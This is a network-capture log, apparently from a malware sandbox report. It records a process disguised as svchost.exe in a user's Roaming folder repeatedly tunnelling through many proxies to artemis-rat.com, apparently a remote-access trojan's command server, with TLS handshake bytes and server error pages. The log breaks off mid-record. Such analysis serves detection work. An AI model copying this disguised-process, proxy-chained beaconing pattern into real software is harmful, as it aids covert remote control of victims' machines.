                                                                                    2527192.168.2.558368104.129.205.945432143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.642838955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2528192.168.2.558292212.231.230.1411850043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.644578934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2529192.168.2.558090103.49.202.2508043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.645672083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2530192.168.2.558264201.71.3.6099943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.646100998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.333594084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146373034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.833703041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146514893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2531192.168.2.558304165.227.104.1225883943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.647082090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.270592928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.068094969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.535595894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.374314070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2532192.168.2.55836354.152.3.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.652931929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.873529911 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:30.874207020 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a5 b3 e0 d3 99 6c 23 bd 5d 5e 78 20 9e 2e 17 0c 32 a2 f8 7e 5a 39 40 5b b7 35 fb 96 73 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRl#]^x .2~Z9@[5s*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:31.090843916 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 4b cd b4 50 d1 0d 21 f9 da 50 62 b0 7f ee 8b b7 f4 d6 af 4c 83 c6 f3 d4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9KP!PbLDOWNGRD0000*H010Uartemis-rat.com0240309120649Z260309120649Z010Uartemis-rat.com0"0*H0)K].S*kC
                                                                                    Mar 9, 2024 13:14:31.090859890 CET536INData Raw: dc 87 a6 79 77 13 1b 72 1b 36 4c c0 5f 8d 99 ab 97 15 34 b2 fb 3d d9 eb de f8 f6 4f 8c e7 65 00 24 f8 e7 69 ff a2 cf 68 c7 c6 e8 f6 d3 90 a6 61 e1 b5 f8 d8 0d b3 9d 08 50 9a a5 6c 80 b3 79 5b 15 3f 26 42 dd 4f 6d f8 63 6e c7 ee 4d e7 01 5a b0 3b
                                                                                    Data Ascii: ywr6L_4=Oe$ihaPly[?&BOmcnMZ;oeB9yY:kPHwNOCGJ{B;,q@w 'v?\fUFL"XF+[-gzHw[&&^eK~+#(P>x,(
                                                                                    Mar 9, 2024 13:14:31.090924978 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 9, 2024 13:14:31.108571053 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 3e b9 a0 c4 71 91 a6 4a ab 84 4c a5 a4 0e 5b 6b 44 62 22 6f aa 91 74 8f 44 17 f1 b3 7b fa 13 1c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 3d 10 4c cd 8f e0 24 85 d5 b0 76 80 ad 93 bb 15 f1 93 2a 25 c7
                                                                                    Data Ascii: %! >qJL[kDb"otD{(=L$v*%?`_3
                                                                                    Mar 9, 2024 13:14:31.330064058 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 6b a7 72 d3 66 62 20 53 1a a2 cc 2d 60 05 32 e4 94 a3 c0 b9 e1 55 7d 2c ac 16 a6 ec 97 45 87 7e 5a 01 cd 8e 81 0d 85 1f
                                                                                    Data Ascii: (krfb S-`2U},E~Z


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2533192.168.2.558267185.104.112.628043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.656750917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.998620033 CET799INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Content-Length: 607
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2534192.168.2.557851112.51.96.118909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.662134886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.067823887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.788106918 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:44 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2535192.168.2.5582798.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.665339947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2536192.168.2.55719920.0.91.1508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.677257061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.787339926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2537192.168.2.557718142.54.231.38414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.680185080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2538192.168.2.558450172.67.53.2158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.689073086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.843465090 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2539192.168.2.557179138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.696887970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.442672014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2540192.168.2.558282212.108.155.205909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.707240105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2541192.168.2.558457184.169.154.1198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.712131977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.885567904 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:30.886626959 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a5 35 b8 66 25 ca e7 a8 42 bc d3 15 c5 de 41 62 42 17 25 55 9b 26 30 e1 65 6a 7d ca 60 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR5f%BAbB%U&0ej}`*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:31.061592102 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 f5 fd 91 a3 f5 c9 fd d5 d1 b0 cc ae 58 bd e5 d5 5f 7a 5c fd 28 41 7b 0b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9X_z\(A{DOWNGRD0000*H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0*H0";dJJH
                                                                                    Mar 9, 2024 13:14:31.065104008 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 20 d3 10 9d cd 7d be 45 ea 00 43 06 1e d6 4c db 5f df df 14 86 cc 27 32 f7 43 29 ad 17 1b d6 43 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b2 d2 f3 20 44 3e 11 35 a9 77 ff bc db 7f 89 b4 22 d6 bd 06 c4
                                                                                    Data Ascii: %! }ECL_'2C)C( D>5w"TeEk42%B
                                                                                    Mar 9, 2024 13:14:31.237322092 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 3a 6e 24 12 8b 36 a0 e0 f3 74 d1 ee a3 7c 62 15 10 45 29 34 3d 94 1b e3 b3 91 c8 3f 05 7b 75 69 d8 bf 87 fa 92 29 10 14
                                                                                    Data Ascii: (:n$6t|bE)4=?{ui)


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2542192.168.2.558445162.214.227.685539243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.715302944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.270543098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880785942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.965059996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.126688957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366343975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2543192.168.2.557613199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.718941927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2544192.168.2.558308202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.729783058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2545192.168.2.558526202.159.35.15344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.730612993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2546192.168.2.558434129.213.150.2058043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.732239962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2547192.168.2.55832343.131.242.1621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.733254910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2548192.168.2.558528202.159.35.15344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
